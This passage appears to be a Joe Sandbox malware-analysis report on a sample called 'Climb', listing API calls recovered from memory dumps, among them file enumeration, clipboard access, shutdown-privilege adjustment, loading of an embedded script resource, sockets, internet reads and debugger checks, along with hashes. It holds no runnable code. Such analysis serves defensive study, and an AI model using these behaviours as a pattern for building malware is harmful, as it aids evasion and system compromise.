                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                      • API String ID: 1946585618-1173974218
                                                                                                                                                                      • Opcode ID: b4100d6508546375f0a43b35a4f1560e844b61013883ba51fe206ccb243a1f6d
                                                                                                                                                                      • Instruction ID: ae6a10db8bcf605f9468e55a4088daf73b42f56218f048dc0b72e59845026861
                                                                                                                                                                      • Opcode Fuzzy Hash: b4100d6508546375f0a43b35a4f1560e844b61013883ba51fe206ccb243a1f6d
                                                                                                                                                                      • Instruction Fuzzy Hash: 96614B3280110DAECF15EBA1C9669FDBBB5BF15305F2040AAE902B7191DB356F0DCBA5
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1737998785-0
                                                                                                                                                                      • Opcode ID: e7c099ffb0a3488964ecba294f85c8f09c28dfcf747cf213bf2b9976176e9d80
                                                                                                                                                                      • Instruction ID: e20a11870e22e1d833f4ac3feabed2b66f5207e60c5835efbeb69b47ed1e800a
                                                                                                                                                                      • Opcode Fuzzy Hash: e7c099ffb0a3488964ecba294f85c8f09c28dfcf747cf213bf2b9976176e9d80
                                                                                                                                                                      • Instruction Fuzzy Hash: A9419D35A04615AFE310CF16E888F257BE0FF54318F14C4ADE8198B6A2C735EC46DBA0
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00552010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0055205A
                                                                                                                                                                        • Part of subcall function 00552010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00552087
                                                                                                                                                                        • Part of subcall function 00552010: GetLastError.KERNEL32 ref: 00552097
                                                                                                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 0055F249
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                      • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                      • API String ID: 2234035333-3163812486
                                                                                                                                                                      • Opcode ID: 8372c5820066c4f2ed72df6349c37157a18c8f8f370980c45d5130379a9d1f16
                                                                                                                                                                      • Instruction ID: c587285d4e0074433876f87e7adf9ec585cc6af5a8a5f73df5f4532c4f74830a
                                                                                                                                                                      • Opcode Fuzzy Hash: 8372c5820066c4f2ed72df6349c37157a18c8f8f370980c45d5130379a9d1f16
                                                                                                                                                                      • Instruction Fuzzy Hash: 6001DBBE6112156BEB1462B89CAAFBB7BACBB48346F150933FD03F21D1D5605D0C97A0
                                                                                                                                                                      APIs
                                                                                                                                                                      • DefDlgProcW.USER32(?,?), ref: 004F233E
                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 004F2421
                                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 004F2434
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Color$Proc
                                                                                                                                                                      • String ID: (\
                                                                                                                                                                      • API String ID: 929743424-3685820393
                                                                                                                                                                      • Opcode ID: 3bf920135c900d77ea9e018140cdd9870982619cbad21a82a9c28cbc07e1bfb6
                                                                                                                                                                      • Instruction ID: 36c5d470872552e703763c68a96e09b1c6018e2ac4c9d40c403c4916ad694123
                                                                                                                                                                      • Opcode Fuzzy Hash: 3bf920135c900d77ea9e018140cdd9870982619cbad21a82a9c28cbc07e1bfb6
                                                                                                                                                                      • Instruction Fuzzy Hash: 6981B3F010540CBEE62966394EA9E7F2E5EFB82304F15010BFA02D6695C99D9F42927B
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,005356C2,?,?,00000000,00000000), ref: 00563A1E
                                                                                                                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,005356C2,?,?,00000000,00000000), ref: 00563A35
                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,005356C2,?,?,00000000,00000000,?,?,?,?,?,?,004F66CE), ref: 00563A45
                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,005356C2,?,?,00000000,00000000,?,?,?,?,?,?,004F66CE), ref: 00563A56
                                                                                                                                                                      • LockResource.KERNEL32(005356C2,?,?,005356C2,?,?,00000000,00000000,?,?,?,?,?,?,004F66CE,?), ref: 00563A65
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                      • String ID: SCRIPT
                                                                                                                                                                      • API String ID: 3051347437-3967369404
                                                                                                                                                                      • Opcode ID: 9ff2fda237c19aed9eaccd93882c4d0190ea1fb212dc13296aaf07140274aed5
                                                                                                                                                                      • Instruction ID: eda7bbd960fa147b4c5f97df5546fb371b1e62aa45e046788c5dccafd81c63b2
                                                                                                                                                                      • Opcode Fuzzy Hash: 9ff2fda237c19aed9eaccd93882c4d0190ea1fb212dc13296aaf07140274aed5
                                                                                                                                                                      • Instruction Fuzzy Hash: B9113575200705BFE7258BA5DC48F277BB9EFC5B51F24426DB842A72A0DB71E904EA30
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00551900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00551916
                                                                                                                                                                        • Part of subcall function 00551900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00551922
                                                                                                                                                                        • Part of subcall function 00551900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00551931
                                                                                                                                                                        • Part of subcall function 00551900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00551938
                                                                                                                                                                        • Part of subcall function 00551900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0055194E
                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000000,00551C81), ref: 005520FB
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00552107
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0055210E
                                                                                                                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00552127
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00551C81), ref: 0055213B
                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00552142
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3008561057-0
                                                                                                                                                                      • Opcode ID: 1744f8d71043b3647b9b7f2df38258af04bc147c30270d2b45dc0c66e85ee8a9
                                                                                                                                                                      • Instruction ID: eac7cfe7cf0164b2b5698739e35b4d43f347b5dc4c431d12841907b51da2739e
                                                                                                                                                                      • Opcode Fuzzy Hash: 1744f8d71043b3647b9b7f2df38258af04bc147c30270d2b45dc0c66e85ee8a9
                                                                                                                                                                      • Instruction Fuzzy Hash: FB11DC71901604EFDB149BA4CC28BAF7BB9FF62356F10401AED41A31A0D731A908DB60
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333
                                                                                                                                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0056A5BD
                                                                                                                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0056A6D0
                                                                                                                                                                        • Part of subcall function 005642B9: GetInputState.USER32 ref: 00564310
                                                                                                                                                                        • Part of subcall function 005642B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005643AB
                                                                                                                                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0056A5ED
                                                                                                                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0056A6BA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                      • API String ID: 1972594611-438819550
                                                                                                                                                                      • Opcode ID: dd087837058a89b19e64bcf9ca7f5f5405a6571d64d722779a096d9b480ab9e9
                                                                                                                                                                      • Instruction ID: f31aec5523228346c919513484305beb2544a0af3fda73f76b2782cc0a076489
                                                                                                                                                                      • Opcode Fuzzy Hash: dd087837058a89b19e64bcf9ca7f5f5405a6571d64d722779a096d9b480ab9e9
                                                                                                                                                                      • Instruction Fuzzy Hash: 8E411A7190020A9BDB14EFA4C949AEEBBB4FF15314F14405AE906B3191EB31AE54DFA1
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00573AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00573AD7
                                                                                                                                                                        • Part of subcall function 00573AAB: _wcslen.LIBCMT ref: 00573AF8
                                                                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 005722BA
                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 005722E1
                                                                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00572338
                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00572343
                                                                                                                                                                      • closesocket.WSOCK32(00000000), ref: 00572372
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1601658205-0
                                                                                                                                                                      • Opcode ID: 01b420ef4ad7869e248e31f056c841ba63ec3dd0edd0f8f50f054dd3eefcd281
                                                                                                                                                                      • Instruction ID: 4f50a167a95f7ad5be4cb81b43c919bc4764d35b150e89a31ecacc21e62e9da3
                                                                                                                                                                      • Opcode Fuzzy Hash: 01b420ef4ad7869e248e31f056c841ba63ec3dd0edd0f8f50f054dd3eefcd281
                                                                                                                                                                      • Instruction Fuzzy Hash: 3B51C075A00204AFEB10AF24C886F2A7BE5AB44718F44C48DF9499F3D3C774ED419BA1
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 292994002-0
                                                                                                                                                                      • Opcode ID: 4311ebbf5f2e2be3cd94f51f5eb149a572953d5045ead0b595b7004e152af45a
                                                                                                                                                                      • Instruction ID: 2cfe18a36fbc917d4768e63b286758d8bbbf8f66ce114c8ce112ae81931eefc1
                                                                                                                                                                      • Opcode Fuzzy Hash: 4311ebbf5f2e2be3cd94f51f5eb149a572953d5045ead0b595b7004e152af45a
                                                                                                                                                                      • Instruction Fuzzy Hash: 6A219C317002159FE710AF27C844B2A7FE5FF94314F588069EC4AEB291D771E842CBA1
                                                                                                                                                                      APIs
                                                                                                                                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 0056D8CE
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 0056D92F
                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 0056D943
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 234945975-0
                                                                                                                                                                      • Opcode ID: 561086dc648e5132d12027e2ebe4b5ed6de0b1b61f5b1bd6f31a66aa74fca520
                                                                                                                                                                      • Instruction ID: 76263cb700587207937a8d8f4f5f03d608027075a969e1dd4d5f0c0ee43acc89
                                                                                                                                                                      • Opcode Fuzzy Hash: 561086dc648e5132d12027e2ebe4b5ed6de0b1b61f5b1bd6f31a66aa74fca520
                                                                                                                                                                      • Instruction Fuzzy Hash: FF217F71A00705AFE7309F65D889BAABBFCFB51314F10481EE646A3191E770EA45DB70
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrlenW.KERNEL32(?,005346AC), ref: 0055E482
                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0055E491
                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0055E4A2
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0055E4AE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2695905019-0
                                                                                                                                                                      • Opcode ID: 2fa59f8e19ed9896686431f1b5364b8ddc0bf75050e7c073dfed51e9b1447993
                                                                                                                                                                      • Instruction ID: f47af29b9579e08bb3e6da59e27bacad3ab5b5db03a20c26dedd114b59715e79
                                                                                                                                                                      • Opcode Fuzzy Hash: 2fa59f8e19ed9896686431f1b5364b8ddc0bf75050e7c073dfed51e9b1447993
                                                                                                                                                                      • Instruction Fuzzy Hash: 81F0A03181091097DA146738AC0E8AA7BBDBE52336B504702FC37D20E0D7799E9DA6A5
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LocalTime
                                                                                                                                                                      • String ID: %.3d$X64
                                                                                                                                                                      • API String ID: 481472006-1077770165
                                                                                                                                                                      • Opcode ID: f8a91a2938c4a91945cd4b757351b46fae467dd53d267b7cf92291e4bd0fb3dd
                                                                                                                                                                      • Instruction ID: 37a26889752d2fb8c2e53af7c952195f789fff19056996745e81c3b150c339c5
                                                                                                                                                                      • Opcode Fuzzy Hash: f8a91a2938c4a91945cd4b757351b46fae467dd53d267b7cf92291e4bd0fb3dd
                                                                                                                                                                      • Instruction Fuzzy Hash: F6D012B1C08108E6CBD09690AC4ACFD7BBCBB28344F254C56F906A1040E6209908A721
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00522A8A
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00522A94
                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00522AA1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                      • Opcode ID: d242beaa5ac61f4e3b1ec071a0974ae431e1fbf2001bc3594d6cd110d21f2da6
                                                                                                                                                                      • Instruction ID: d5ba2eaa647de4c4b9c836f2c9c5250ea9192795ccab34462aae34f80fd291e9
                                                                                                                                                                      • Opcode Fuzzy Hash: d242beaa5ac61f4e3b1ec071a0974ae431e1fbf2001bc3594d6cd110d21f2da6
                                                                                                                                                                      • Instruction Fuzzy Hash: 7531D77490122DABCB21DF64D9887DCBBB4BF18310F5041DAE80CA6290EB709FC58F55
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0051014B: __CxxThrowException@8.LIBVCRUNTIME ref: 005109D8
                                                                                                                                                                        • Part of subcall function 0051014B: __CxxThrowException@8.LIBVCRUNTIME ref: 005109F5
                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0055205A
                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00552087
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00552097
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 577356006-0
                                                                                                                                                                      • Opcode ID: b1b59a3977f2f9112ad9ce6d8232f74c6a7a215a0b2fa3617e92e0daee45f96a
                                                                                                                                                                      • Instruction ID: cfe118f77ef340b79430076237e313d112ddef02454da19b59d50e6d9a0038b8
                                                                                                                                                                      • Opcode Fuzzy Hash: b1b59a3977f2f9112ad9ce6d8232f74c6a7a215a0b2fa3617e92e0daee45f96a
                                                                                                                                                                      • Instruction Fuzzy Hash: 521190B2400205AFE718AF54DC8AD6BBBB8FB45711F20841EE84656291EB70AC85CB60
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,0051502E,?,005B98D8,0000000C,00515185,?,00000002,00000000), ref: 00515079
